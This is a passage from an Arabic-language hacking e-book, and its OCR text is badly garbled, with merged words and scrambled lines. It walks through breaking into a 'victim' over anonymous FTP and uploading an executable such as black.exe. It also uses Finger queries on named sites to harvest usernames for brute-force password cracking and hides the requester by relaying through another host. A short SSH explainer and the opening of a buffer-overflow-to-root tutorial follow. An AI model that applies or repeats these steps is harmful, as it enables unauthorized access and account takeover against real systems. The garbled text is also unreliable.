، Type Termانكانلدیك والاقمبالتجربة.‏ بعد ذلكاضغط Connect وعندمایتمالربطفستحتاج<br />

لادخالالاسم والرقمالسري.‏ وبعدالانتهاء منالنقلاختر Disconnectمنقائمة Connect وبعد ذلك<br />

اختر … Exit<br />

System.<br />

٢٥


hi_HaCkEr & MaXhAk2000<br />

"<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

" الإختراق عن طریقFTP<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$$$$$$$<br />

hacker dz<br />

$$$$$$$$$$$$$$<br />

الكاتب:‏<br />

FTP<br />

٢<strong>١</strong><br />

الیوم سوفنتناول طریقة إقتحام عبرالا فتيبي أولا ولنجاح ا لإقتحام یجبان یكونلدى<br />

الض حیة البور ت مفتوح و هوالبور تالخا ص بال و لتأكد منأنالبورت مفتوح علیكان<br />

تستعملبرامج السكان وهيكثیرة و مناهمها Superscanne بعدما تتأكدانالبور ت مفتوح ننتقل<br />

الى الخطوةالثانیة و هي :<br />

إ ضغط على<br />

Start<br />

ثم<br />

Run<br />

ثماكتب<br />

ftp – n<br />

سو فتطلعلك نافدةفيالدوس مكتوب علیها<br />

<br />

To<br />

أكتببجانب<br />

To<br />

رقمالإبيللض حیةثمإ ضغط علىإدخال والآن خدبالكمعي<br />

إدات حصلت على هداالردفقدتخطیت خطوة<br />

FTP<br />

Connected to www.assassin.<strong>com</strong><br />

.(websrv1 Microsoft FTP Service (Version 4.0 ٢٢٠<br />

و الآ نأكتب الكتابةالتالیة ftp>quote user ftp<br />

إدات حصلت على هدا الردفقدتخطیت خطو ة<br />

Anonymous acces allowed, send identify (e-mail name) as<br />

٣٣<strong>١</strong><br />

password.<br />

و الآ نأكتب الكتابةالتالیة<br />

ftp>quote cwd ~root<br />

إدات حصل ت على هداالردفقدتخطی ت خطوة<br />

530 Please login with USER and PASS<br />

ثمأكتب الكتابةالتالیة<br />

٢٦


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

ftp>quote pass ftp<br />

إدات حصلت على هداالردفقدتخطیت خطوة<br />

و نجحتفي ا لإقتحام<br />

230 Anonymous user logged in.<br />

مبروكأنتالآنفي جهازالض حیة<br />

Get<br />

ما علیكالآنالاانتقوم بإ ستعمال<br />

اوامرالا فتيبي::‏<br />

و طبعالنامر علیها مرورالكراملكي لاتقعوفي المشكلةالي وقع تفیها و هي نجاح ا لإقتحام من دون ما<br />

أعر ف و لافكرة علىاوامرالفتیبي وإدااردتمانتضحكو بقالیأكثر من ٢٠ دقیقة وانا مجمدالإیديو<br />

الض حیة عالقة من دونأنأعملأي شيء ولهدا<br />

قمتبحضیرال ىوامرلكيتطبقوها مباشرةا بعد نجاح ا لإقتحام<br />

Pwd<br />

لكيتعر ما یحتویه الهارد دیسك<br />

Cd<br />

لإقتحام مجلد مثال<br />

Cd black<br />

في هدا المثالقمت بإقتحام مجلد المسمىبلاك<br />

Ls<br />

لكيیتضحلك محتو ى المجلدأوالهارد دیسك<br />

لكيتحمل الى سطح المكتب بتا ع جهازك من جهازالض حیة<br />

مثال<br />

Get black.exe<br />

Put<br />

العملیةالعكسیة ل<br />

Get<br />

یعنيانتأخد مل ف من سطح المكتب بتا ع جهازك وتضعهفي جهازالض حیة<br />

مثال<br />

Put black.exe<br />

Clos<br />

لقطعالإتصال معالض حیة<br />

هديأهمالأوامر والآن سونتطرق علىأنوا ع الرسائلالينت حصل علیها من جهازالض حیة أثناءتطبیق<br />

الأوام و شرحها وارقامها<br />

Codes: Signification:<br />

Restart marker reply. <strong>١</strong><strong>١</strong>٠<br />

Service ready in nnn minutes. (nnn est un temps) <strong>١</strong>٢٠<br />

Data connection already open; transfer starting. <strong>١</strong>٢٥<br />

150 File status okay; about to open data connection.<br />

200 Command okay.<br />

202 Command not implemented, superfluous at this site.<br />

211 System status, or system help reply.<br />

٢٧


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

212 Directory status.<br />

213 File status.<br />

214 Help message.<br />

215 NAME system type.<br />

220 Service ready for new user.<br />

221 Service closing control connection.<br />

225 Data connection open; no transfer in progress.<br />

226 Closing data connection.<br />

227 Entering passive mode (h1, h2, h3, h4, p1, p2).<br />

230 User logged in, proceed.<br />

250 Requested file action okay, <strong>com</strong>pleted.<br />

257 "PATHNAME" created.<br />

331 User name okay, need password.<br />

332 Need account for login.<br />

350 Requested file action pendingfurther information.<br />

421 Service not available, closing control connection.<br />

425 Can't open data connection.<br />

426 Connection closed; transfer aborded.<br />

450 Requested file action not taken. (Fichier déjà utilisé par autre<br />

chose)<br />

451 Requested action aborded: local error processing.<br />

452 Requested action not taken. (Pas assez de mémoire pour<br />

exécuter l'action)<br />

500 Syntax error, <strong>com</strong>mand unrecognized.<br />

501 Syntax error in parameters or arguments.<br />

502 Command not implemented.<br />

503 Bad sequence of <strong>com</strong>mands.<br />

504 Command not implemented for that parameter.<br />

530 Not logged in.<br />

532 Need account for storing files.<br />

550 Requested action not taken. (Fichier non trouvé, pas d'accès<br />

possible,...)<br />

551 Requested action aborded: page type unknown.<br />

552 Requested file action aborded.<br />

553 Requested action not taken. (Nom de fichier non attribué)<br />

..........<br />

٢٨


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

بروتوكول خدمة<br />

"Finger<br />

"<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$$$$<br />

الكاتب LAMeR:<br />

$$$$$$$$$$$$<br />

شرح لاحدالبروتوكولاتالمهمةفي جمع المعلوما ت عن مستخدميالموقعاوالسیرفر<br />

للمعلومیة وقبل البدءبهذاالموضو عفهذاالبرتوكولیعمل على البورت 79<br />

1.1 مقدمة عنFinger<br />

‎1.2‎استخدامFinger<br />

ب ع ضالخد ع عنداستخدام خدمةFinger<br />

‎1.4‎الأستعلام عن طریق موقع بأستخدامFinger<br />

‎1.5‎الأستنتاج من هذا الدرس<br />

‎1.6‎الختام<br />

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^<br />

معین )<br />

.<br />

1.3<br />

1.2 مقدمة عنFinger<br />

<br />

إنّ‏ Finger دیمون خدمةتعمل عن طریق البورت ٧٩ عادة وكانت<br />

مستخدمةأصلاكنوع businesscardرقميللناس<br />

المستخدم البعید ) user remote ‏)یمكنأن یرسل طلبإلى Finger دیمون یجري على نظام<br />

بورت Finger نوعیة ‎٧٩‎‏)وسی حصل علىإجابة.‏<br />

هذهالإجابة ستخبرك منهم المستخدمین على هذا النظام وأیضا بع ض المعلومات عن هؤلاءالمستخدمین<br />

المتصلی نبالنظام.‏<br />

إ ضافةإلى هذه المعلومات،فيأغلبالأحیانالإجابةتخبركأیضا من الذي یدیر النظام admin) ‏)وكی ف<br />

قامبالإتصال.‏<br />

قدیمااستخدمالناسالأتصال على جمیعانوا ع الأنظمةفيالعالم وطلبالأستعلام عن هذه الأنظمة وال<br />

Finger یعطیهممعلومات عن الموجودینفيالنظام وهللهم حساباتفي هذا النظام.وكان Fingerكان<br />

یستخدمقدیمافي الجامعات والشركاتالكبیرةأیضا.‏<br />

في الماضي ‏،ال Finger إ ستعمل عامة عن طریق الطلابفيالجامعات اذاارادوا معلوماتتخ ص طلاب<br />

اخرینفي نفسالجامعه . وكثیرا ماتكون الأجابة<br />

أعلمني<br />

أماالآن ومع وجود شبكة ا لإنترنت العالمیةاصبحFinger أقل شهرة ‏،لأنهتوجدالآن مواقع الویب<br />

رقمیة خاصةبمستخدمین الأنترنت وبسبب ملاحظة الناسالتهدید<br />

للعملكبطاقة<br />

الواسعللأمنالألكترونيقلّاستخدام خدمةDeamon Finger<br />

‏(اجابة ) Deamon Fingerبجملة " Finger<br />

" !<br />

عمل (bisinesscard)<br />

.<br />

" ‏!‏meاي "<br />

علىأیة حال،لیسكلالأنظمة منعت هذهالخدمة وستجد بع ضالمواقع ‏(الأنظمة)تقدم هذه الخدمة.‏ وهذه<br />

الأیام یقوم الهكرزبمحاولاتاختراقالأنظمة بأستخدامبرامج portscans للب حث عن البورتات<br />

المفتوحة.‏ . ‏.بدونأيّأساس علمي<br />

لذلكإنّ‏ Finger دیمون،‏ مثال عظیملخدمةیمكناستخدامهاقانونیا لتزودك بكمیة ضخمة من المعلومات<br />

ال حسّاسة<br />

٢٩


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

حول هد ف.‏<br />

لهذا سو فأحاولاناشرحفي هذاالدرسبلغة مفهومة<br />

ما هو Finger دیمون وماذا یفعل وكیف یمكناستخدامهفي مصلحتك<br />

الخلاصة المقدمة:ان خدمة Fingerكانتقدیما ولازال تتستخدملجلبالمعلومات عن المستخدمین<br />

الموجودینفيالنظام وهللدیهم حساباتفي هذا النظامام لا.‏<br />

:<br />

ملاحظة ‏:النظام ) server ‏)هو جهازكمبیوترتخزنفیهمعلوماتهائلة ویستخدمفياستضافةالمواقع<br />

‎1.3‎استخدامFinger<br />

<br />

عنداستخداماي منبرامج السكان المعروفة مثل ) superscan‏)للب حثفي موقعمعین<br />

http://www.israel.<strong>com</strong>/ ) ووجدتبه منفذ Port‏)بور ت)‏ ٧٩ مفتوحا هذایعنيان<br />

http://www.israelr.<strong>com</strong>/<br />

له Finger دیمونیعمل.‏<br />

عن طریق وندوز<br />

الآنكی ف<br />

صلل Finger<br />

خا فيأغلبالأحیان وندوز لا یوجدبه زبون (client) سو ف نستخدم Telnetكخادمل Finger<br />

توضیح--‏<br />

) مثلا<br />

مركب ) installed ‏)لذلك<br />

نقومب request) ( طلباستعلام؟<br />

--<br />

Telnet(client) --------request-------> Finger Deamon(in Server) o<br />

الآتيفي موجة الدوس:‏ ) DOS (MS<br />

79http://www.foobar.<strong>com</strong>/telnet<br />

.<br />

عن طریق كتابةالسطر<br />

بعد ذلك سیظهرلكبرنامج telnet و منهتطبع الأوامر<br />

اما من یونیك سلسنابحاجةإلىأن نستعملتیلن تلأنه یوجدبنظاملینوكس زبون(‏client‏)‏ خا صبخدمة<br />

مركّب على النظامبشكل دائمتقریبا.‏<br />

ملاحظة سیكونالشرحالتالي حتى نهایةالدرسلمستخدميلینوك سأماأذاقررتالأستمرار بأستخدام<br />

وندوز ستكون كتابةالأوامرفي موجه الدوسثمفيالتلنت وستكون كتابة الأوامرهي نفس الأوامر التي<br />

تكتب بأستخدام نظاملینوكس ولكنبدل نضع ‏"مسافةثم ‏"‏wwwفي الوندوز مراعیااسمالموقع<br />

مثلا یكون كتابة الأوامرفيلینوكس هكذا<br />

Finger Deamon<br />

:::<br />

"@ "<br />

:<br />

finger@anyname.<strong>com</strong><br />

http://www.anyname.<strong>com</strong>/finger :<br />

لاحظالمسافةبین finger و www<br />

) على افترا ضانكتستخدم ) shell ( unix<br />

finger@israel.<strong>com</strong><br />

ولكنفي وندوز سیكون هكذا<br />

اطبعفي مح ثالأوامرفي یونكس<br />

لاحظان الهد ف ‏(ل معرفة منهم مستخدمي هذاالموقع ‏)هناهو ‏/‏http://www.israel.<strong>com</strong>كمثال<br />

فستظهرالنتائج:‏<br />

Login: Name: Tty: Idle: When: Where:<br />

root israel sys console 17d Tue 10:13 node0ls3.israel.<strong>com</strong><br />

Amos Amanda <br />

Anderson Kenneth<br />

Bright Adrian<br />

Doe John<br />

٣٠


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

Johnson Peter <br />

Mitnick Kevin<br />

Munson Greg<br />

Orwell Dennis<br />

الآن ماذاتعني هذه النتائج؟<br />

نرىأسماءالمستعملین وفي الثاني"‏ (Name) الأسماءالحقیقیة "،<br />

التيبالطبعلیست حقیقیة،لكنفيمعظم الوقت حقیقة.‏ ویریناالعمود الثال ث(‏Tty‏)‏ النو عالطرفي the<br />

terminal type<br />

والرابع (Idle) فترةالتوق ف.‏time the idle وبعد ذلكفي العمودینالخامس والسادسالوقت والمكان<br />

الذياستخدمفیهال حسابللأتصالبالنظام.‏<br />

..<br />

في العمودالأول(‏ ( login<br />

أحیاناتوجدأعمدة بعنواوینالأیمیلات وأرقام هواتف الخالخاصةبمستخدمین هذاالنظامو إ ذاكنتترید<br />

المزید منالمعلومات عن مستخدممعیّ‏ ن Johnson‏)بیتر Peter جونسن على سبیلالمثال)أدخلالأمر<br />

التالي :<br />

johnson@israel.<strong>com</strong>finger<br />

1.4 بع ضالخد ع عنداستخدام خدمةFinger<br />

< =========================<br />

أتمنّىالآن شاهدت ما الضع ف الرئیسيلخدمة Finger. Fingerیریك deamon ماهي<br />

ال حسابات الموجوده على النظام.‏ وهذایعنيأنكتكسب ‏(عن طریققانوني من المجموعة<br />

السحریة وهيكلمات السر/مجموعةأسماءالمستخدمین التي ستمن حكالدخول(‏Access‏)إلى نظام.‏<br />

إ ذا عرف تأسماءالمستخدمین،‏ ستكون الخطوة القادمة متوقفه علىبرنامج bruteforceأوبمعنى آخر<br />

% ٥٠ (<br />

.....<br />

برامجتخمینالباسوورد wordlist passowrd cracker<br />

.<br />

هناك سكربتات خاصّة كتب تللتیلنت على سبیل المثالاذهبلموقع<br />

VLAD's حث عنpwscan.pl ‏/‏http://www.thehackerschoice.<strong>com</strong>أواب<br />

لذلك یجب علیكانتكونقائمة بكلماتالسرفي مل ف نصي (word او المفكره ( وحاولانتكونكلمات<br />

السرقریبة منأسماءالمستخدمین وإ ذالمتعمل القائمةاستخدمبرنامج-‏ bruteforceأنص حكبهذا<br />

الوق تانت حظرلككأس شاهيوتأخذلكاستراحة وتجعل البرنامجیعمل عمله-‏<br />

بالطبع نجد بع ضال حسابا تللمستخدمینللنظاماكثراهمیة من غیرها منال حسابا ت.وخاصة حسابالإدارة<br />

بسببانه عندماتعر فالباسووردالخا صبهم وقتهاتستطیعالتحكمبالموقع<br />

. وبالطبع بع ضال حسابات سهلةتخمینكلمةالسر و لهنا ك بع ضالخدعلمعرفة هذاالنو ع منال حسابا ت.‏<br />

على سبیلالمثال ‏...إ طبع الأمر :<br />

secret@israel.<strong>com</strong>finger<br />

عندماترسل هذا الأمر الي Finger Deamon سیعطیك جمیعال حساباتالتيتحتوي علىكلمة<br />

أمّافياسم المستعملأوالإسمالحقیقي.اذا،‏ ماهوالشي المهمفي هذا؟ حسناأنتیمكنكأن<br />

تستعمل ‏"‏test‏"أو ‏"‏temp‏"أو ‏"‏‎٠٠٠٠‎‏"بدلا من "secret" وكماتعر ف من المحتملان یكون<br />

هذاالنو ع من ال حسابات سهلمعرفةباسوورداتهفيأ غل ب الأحیان.‏<br />

finger .@israel.<strong>com</strong><br />

0@israel.<strong>com</strong>finger<br />

جرب هذه الأوامر وشاهد مایحد ث!‏<br />

حاولالتعر ف على Deamon، Fingerأقرأ RFCوأوجد خدعكبنفسك!‏<br />

( root) الجذر ‏(‏Admin‏)أو<br />

" secret"<br />

٣<strong>١</strong>


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

‎1.5‎الأستعلام عن طریق موقع بأستخدامFinger<br />

‏"استعلم")‏<br />

"<br />

< =========================<br />

إ ذاأرد تاناستخدم خدمة)‏ Finger معنى Fingerكفعل ألم س"‏ ولكنهاتأتيهنابمعنى<br />

والأستعلام عن موقعمعین مثل هذاwww.victim.<strong>com</strong> وأیضاتعر فأن موقع آخر<br />

خدمة Fingerتعمل،‏<br />

عندها یمكننيان أقدم طلبا مثل هذا:(‏ اكتبفي مح ث الأوامر مثل هذا ( finger@host.<strong>com</strong><br />

@victim.<strong>com</strong><br />

Host.<strong>com</strong>یستعلم (Finger) الآن victim.<strong>com</strong> ویریكالنتائج.‏<br />

أحدالفوائد من هذه الطریقةانك ستكون مجهوللدىvictim.<strong>com</strong> فعندماتقوم<br />

.<br />

www.host.<strong>com</strong>" ‏"یقدم<br />

http://www.victim.<strong>com</strong>/<br />

)<br />

.<br />

بطلب سجل الدخول log) ستشاهد/‏http://www.host.<strong>com</strong>في سجلاتهم،بدلا منك<br />

فائدةاخر ى وهيأنك یمكنان تترك)‏ Host موقع)‏ یقوم ) عن طریق خدمة(‏ Fingerبالأستعلام عن<br />

حاسوبا<br />

آخرا على نفسالشبكة ‏،بینمااذا طلب تانت هذا الأستعلام بأستخدام خدمة Finger من جهازكلنتكون<br />

مسموحةلكلأنك سأكون غیر موثوقبهلد ىالمستعلم عنه بعك ساذاكانالطلب ل لأ ستعلامباستخدام<br />

Fingerعن طریق موقع<br />

یعنيالخلاصة ‏:انالموقعالذيتریدالأستعلام عنه یعتبر حاسوبك الشخصي غیر موثوقبه بعكس اذاكان<br />

الأستعلام عن طریق موقعاخر یشابههفسو ف یسمحله<br />

.!<br />

"<br />

‎1.6‎الأستنتاج من هذا الدرس<br />

< ===============><br />

( access ) یكون مصدر معلومات ضخملأي واحد یحاولكسبالدخول Fingerیمكنأن Deamon<br />

إلىالنظام.‏<br />

Fingerقانونیایزوّدكبنص deamon فكلماتالسر واسماءالمستخدمینالتيتحتاجهالكسب<br />

الدخول.‏access<br />

هناكبضعة خد علطیفةتمكنك منمعرفة حسابات خاصةتب حث عنها منمعرفتكلهذهال حسابا تتستطیع<br />

كسرالباسووردات،‏ بإ ستعمالتقنیة wordlistأو.‏bruteforce<br />

تذكّ‏ رفوائد الأستعلام عن طریق موقع"أیضا بأستعمالdeamon Finger<br />

...<br />

٣٢


‏"شرح ال<br />

hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

"secure shell<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$$$$$$$$$$$$<br />

الكاتب BURN_EG: ACID<br />

$$$$$$$$$$$$$$$$$$$<br />

قداسبقهاالكاتببمقدمة من عنده ....<br />

تعتبرأداة secure shell منأهمالادواتفىالشبكاتوتعتبر هامة جدابالنسبةلمخترقيالمواقع و<br />

تستخدمهامعظمالسی رفرات علىالانترنت و غالبا ما نجدهابهذاالاختصار::‏ SSh<br />

ما هىال SSh؟<br />

==============<br />

ال secureهىاداه shell ‏(برنامج)للاتصال و الدخول الىكمبیوتراو جهازاخر علىالشبكة لتنفیذ<br />

اوامراو مهاممعینه داخل هذاالجهازبمعنىالاتصال عن بعد remotelyوتستخدم connection<br />

ایضافى نقلالملفات منكمبیوتر الىاخر و هىتقدمتوثیققو ىو اتصالامن جدا فىقنواتالاتصال<br />

الغیرامنه وهىتعتبركبدیل جید جداا لادوا تتستعمللنفسالغر ضفى یونكس مثل (rlogin,rsh and<br />

rcp).<br />

وتقدمایضاال secure shell اتصالامن جدالشحنات اتصالاتال tcpكونیكشن .<br />

و هنا یأتى سؤال مهم :: و السؤال هو<br />

::<br />

لماذا یفضلاستخدامال secure shell علىالادواتالاخر ىالتى یطلق علیها ‏-‏rفى <strong>com</strong>mands<br />

یونكس كالمذكورینفىالاعلى ؟<br />

======================<br />

فىتوزیعاتالیونكس مثلال BSD‏*ت تعر ض الادواتالتى یطلق علیها -r <strong>com</strong>mands مثل<br />

rcp) rlogin,rsh and ‏)الىانوا ع مختلفه من الهجمات حیثانهلو شخ صاستطا عان یكتسبال<br />

روتاكسیس access) root‏)للاجهزهالتى على الشبكهبطریقه مااو فعلها ن طریق اتصالفیزیائى<br />

ا ى ریموتلى یمكنهان یدخلالىكلبیاناتالاجهزه التى علىالشبكهبدونادنىصعوبه لانه یستطیع<br />

بالروتاكس سان یعبر من خلالا ىاداه منالمذكورهفى یونكسبدون ا ىصعوبه و یمكنهتفادیهابطرق<br />

معینه و هذا ما یسمى بأنالشخ صلدیه unauthorized access to systems اعتقدانكم<br />

فهمتونىالانو یمكنایضا لا ى شخ صانیراقب النت وركترافیك و یلتقطكلالباكیدجس من خلال<br />

شبكتك وتكون هذهالباكیدجستحتوى علىالباسوردسللسیستمل شبكتك.‏<br />

ملحوظه:‏ طریقه مراقبهالنت وركترافیكهى طریقه حقیقیهفىالاختراق وتستخدمفىاختراقالمنظمات<br />

الكبر ى وتقعتح تبندتقفىالاثر والاعدادللاخت راق<br />

والاننعود الىالسیكیور شیلومزایاالسیكیور شیلتظهر هنا معكل عیوبالادواتفى یونكس<br />

فالسیكیورشیل یطالب الشخ صالذ ىلدیه الروت اكسسایضا بأنیتصل اتصال موثوق عبره ا ىلایعطیه<br />

الح قللدخول الىبیانا تاجهزهالشبكهالابالباسورد و لا یمكن التحایل علىال sshفى هذهالنقطه و<br />

بذلك حتىلوتمكنالشخ ص مناكتساب الروتاكس سلن یستطسعالاطلا ع علىبیانات الشبكه الا ب<br />

. (<br />

authorized access to systems .<br />

و النقطه الثانیههىاناذا حاولاحداختراقك عن طریق مراقبه النت ورركترافیكلشبكتك والتقاط<br />

الباكیدجسالتىتحمل معلوماتك وباسورداتكفسیخیبامله لان السیكیور شیل لا یرسل الباسورداتفى<br />

صوره واضحهكماترسلهاادوات یونكسالاخر ى ولكن یرسلها مشفره ولذلك سیكون علىالمخترق<br />

٣٣


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

(<br />

محاولهفك الشفره والخ<br />

ولكن معكل هذه المزایالم یخلىال secure shell من الثغرات ولكنتعتبرثغراتهقلیلة وتقریبا<br />

معظمها یحتاجالىالرووتاكسس والاخرى یمكنانتخترقالسیكیور شلفقطبها ‏(هذاكلامبینى وبینكم<br />

والان سؤالاخر<br />

.<br />

.<br />

::<br />

ما هىانوا عالهجومالتىتحمى منهاال ssh؟<br />

==========================<br />

‎<strong>١</strong>‎‏-تحمى منال ip spoofing اىتحمى منانتحال عنواینالا ىبى حیثانهلوارسل شخ ص ما<br />

باكیدجس منا ىبى یظهرانه موثوقبه ولكنهفىالحقیقهلیس موثوقبه یكشفهال sshوتحمىایضا<br />

من المنت حلین على الشبكهالم حلیهاى.‏ localy<br />

‎٢‎‏-تحمى مما یسمىال DNS spoofing<br />

‎٣‎‏-تعتر ض ظهورالتیكستسالتى یكون مخزن علیهاالباسورداتالواضحه وبیانات الهوستس .<br />

٤ ‏-تحمیك منمعالجهالبیاناتالمخزنهاىتمنعا ى شخ ص غیر موثوقبه من عملایدیت لا ى داتا مخزنه<br />

.<br />

ولكن معكل هذافأنال sshلی سامنبدرجهكبیره حیثانالاشخا ص ذو خبرهكبیرهفى النت ورك<br />

یستطیعونان یجعلونال sshینقطع عنالاتصا لاى disconnected ولكن لا یمكنان یكسرو<br />

تشفیربیاناتهاویعیدواتشغیل الترافیك الذ ىكان ینقلها .<br />

وایضاكلالاشیاءالتىتكلمنا عنهابلأعلى سو فتعملفقطاذاكن تتستخدم خاصیهالتشفیر التىتسمح<br />

لكبهاال ssh و هىتسمح بأكثر من<br />

ماترید منهم وایضا هناكاوبشناى خیارفىالاداهتسمح<br />

لك بعدمتشغیلالتشفیرا ى"‏ encryption of type "none وبهذاتجعلنىاقول علیكاحمق ‏!لان<br />

هذا یجعلال ssh سهله الاختراق مثلالادواتالتىتم ذكرهافىاولالمو ضو عفى یونكس حیثان هذا<br />

ال ssh<br />

نوعتشفیر مثل-‏RC4‎ (three-key triple-DES, DES,<br />

Blowfish) TSS, ‏,‏‎128‎یمكنكاستخدام<br />

،<br />

التشفیر ایضا یمنعال ipوال spoofing DNS spoofing و هذاایضابالاضافهالىتغییر مفاتیح<br />

فكالتشفیركل فترهمعینه ویتمتدمیر مفاتیحالتدمیر التىتماستعمالهاتماما.‏<br />

اذنفهىاداه حقا ممیزه وتستحقالاحترام والاهتمام معانها لاتخلو من الثغرات ولكنلنجعلهاافضل<br />

ال موجود حالیافى هذاالمجا ل...‏<br />

٣٤


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

شرح معنى الOverflows Buffer<br />

"<br />

$$$$$$$$$$<br />

الكاتب : Lamer<br />

$$$$$$$$$$<br />

وتوجد العدید منالكتاباتفي هذاالموضو علكني حاول تاناكتببطریقة مبسطةاكثر حول هذاالموضو ع<br />

بطریقة یفهمهاالجمیع<br />

- <strong>١</strong> ماهو ال Buffer؟ Overflow<br />

-٢ المعالجه(‏Proccess (<br />

‎٣‎‏-إدارة الذاكره(‏management (Memory<br />

‎٤‎‏-استغلال ماذكرفي الOverflow Buffer<br />

‏*یجب علىكل مختر قانیتعلمكل مهمفيالبرامج وادارة الذاكرة ومواطنضعفها وقوتهالیستطیع<br />

التعاملمعها والتحایل علیها ومن هذاالمنطبقكان هذاالمقال .....<br />

ماهو الOverflow Buffer؟<br />

.<br />

-<strong>١</strong><br />

------------------------------------<br />

Buffer Overflow<br />

حالةتحد ثلبرنامجبسبب خللبرمجيفيبرمجتة هذا البرنامج<br />

احد ثثغرة یمكنكأستغلالها من نو ع Bufferتسمىفایروس Overflow ، red' 'code التيأستغلت<br />

في خادم IISلمایكروسوف ت-‏ -MS web server<br />

عموما،‏ یحد ث Buffer Overflow عندما یظهربرنامج ما متغیّرب حجمثابت ‏(على سبیل المثال،‏ حجم<br />

‎٢٠‎بای ت)‏ والقیمةالتي خصّصتإلى هذهالمتغیّ‏ رأكبر من حجمالمتغیّ‏ ر.‏<br />

خذ هذا المثال :<br />

یظهربرنامجي علىالشاشة هذها ال رجاءادخالاسمالمستخدم ‏"وانا مثلابرمجة هذا البرنامج<br />

بح ث یكون منطقیااناسمالمستخدملنیتجاوزفياسوأالحالات ٣٠ حرفا مثلا<br />

البرنامجبشكل طبیعيلكن متىتكون المشكلة<br />

المشكلة هناتكوناذاتمادخل مثلا ٢٠٠ حر فكاسمللمستخدمفالبیانات هذهالزائدةتكون عبارة عن<br />

طفحان وهو ما یسمىبال Overflow" ‏"على الذاكرةالتي خصّصتلمتغیّ‏ رالاسم.‏<br />

عندما یبدأالبرنامج،تخصّ‏ صالذاكرة<br />

STRING(30) وسیعمل<br />

.....<br />

لجملة:‏ "<br />

:<br />

اذنكی فأستغلّ‏ هذا الخطأ؟؟؟<br />

قبلأنتصل لاجابةعلى هذا السؤال سنأخذ جولة حول مایتعلقبهذاالامرفيبنیة الحاسزب.‏<br />

في هذه المقالة سنناق ش نظاملینكس ‏،‏linuxلكن المفهوم مماثللباقي الأنظمة.‏<br />

- ٢<br />

المعالجه:(‏Proccess (<br />

---------------------------<br />

٣٥


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

إنّ‏ الوحدة الوظیفیةالأساسیةفي حاسوبیعمل هي عملیة المعالجه.(‏Proccess‏)في الحاسوبهنالك<br />

العدید منالعملیات ونظامالتشغیل مسؤول عنتقسیم القوّةالتيتجعل العدید من العملیاتتعملفي نفس<br />

الوقتفي الحاسوب.‏<br />

ص حیح...كی فاذن؟؛ان َّ وحدة<br />

لیسهناك شيءإسمه<br />

تنتقلبینالعملیاتكلُ‏ على حدهبسرعةكبیرهب حی ثتبدو مثلالعدید منالمهام<br />

المعالجةا<br />

التيتعملفي وقت واحد،‏<br />

.. (:<br />

" متعددالعملیات proccesses" Multi-<br />

لمركزیة (CPU)<br />

اذاتبدولناكأنالعملیاتتعملفي وقت واحد وهذه من خد ع الحاسوبالتيیؤدیها علینا<br />

كلّ‏ عملیةلها عنوانفاضي منالذاكره ، ولایمكنلأي عملیةآخر ىتدخلفي هذاالمكان الفاضي من<br />

الذاكرة.‏ وهذا یرشدناالى شياخر یجبانتفهمه وهو :<br />

- ٣ إدارة الذاكره:(‏management (Memory<br />

------------------------------------------------<br />

تدیرأنظمة التشغیل-‏systems operating ‏-الحدیثة ذاكرةافتراضیة(‏memory virtual ظاهریة).‏<br />

وهذه الذاكرةتفید عندما یكونلدینا عددكبیر منالمهام موجه الى الذاكرةالحقیقةالرام ... وفي نفس<br />

الوقتفالذاكرةالحقیقةأصغر منكمیةالمهام الموجههللذاكرةالحقیقة<br />

هنا یأتي دور الذاكرةالافتراضیة حی ثتقومبخزنالبیاناتاو المهامفي مكان ما على الهاردیسكفي<br />

وتعامل هذهالبیانات وكأنهافيالذاكرةتماما ویتم<br />

منطقة یطلق علیهاال<br />

عملیة نقلها من والى الذاكرةبادارة هذه الذاكرةالافتراضیة من خلال عملیة یطلق علیها<br />

وهذا ملخ ص عنالذاكرةالافتراضیةاما الذاكرةالحقیقةفهيمعروفةلد ىالجمیع والتي یطلق علیها<br />

swapping<br />

)<br />

...<br />

Back store او SWAP<br />

READ ONLY MEMORY او الذاكرةالفیزیائیة ...<br />

(RAM<br />

------<br />

‎٤‎‏-استغلال ماذكرفي الOverflow Buffer<br />

---------------------------------------------<br />

الآن نصلإلىالجزء الأهم والمرح ‏....كی ف نستفید منالذيقلنا عنالمعالجة وإدارةالذاكرةللوصول<br />

والدخولالى الجذر (Root) وأختراق النظام؟تذكّر ن حنقلنافي وقت سابق بأنّه عندما یكون<br />

